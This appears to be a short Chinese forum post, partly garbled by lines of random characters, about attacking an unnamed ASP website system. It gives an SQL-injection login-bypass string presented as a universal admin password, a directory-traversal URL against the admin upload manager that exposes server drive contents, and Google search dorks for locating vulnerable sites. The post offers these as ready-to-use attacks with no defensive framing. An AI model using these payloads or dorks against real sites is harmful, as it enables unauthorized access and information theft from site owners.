后台万能密码 'or'='or'
2 x! G+ v) v) i; Q$ n* m$ O& k
$ |1 k9 c' G, o7 Z1 u- P后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
* v/ x) T. Z! |6 x! Xadmin/uploadfile.asp?currentFolder=/upfiles/../
2 F; h) A) E8 y$ ]) p4 q
" v* |, N$ ?: @# S b: o: A/ A漏洞证明:% a4 E- ] a! O" R9 O2 B
+ m5 h* B2 h) l0 ?- {( b+ h' ?5 |谷歌:inurl:type.asp?id=1 新闻中心! g5 |. M: [) i1 o# J) c! ]+ ]
或者 :inurl:download_ok.asp?
' y1 Y ? M1 B2 _$ Y; X! h8 }) F, p
) x. p: T$ |$ a d. A+ |+ Z/ c |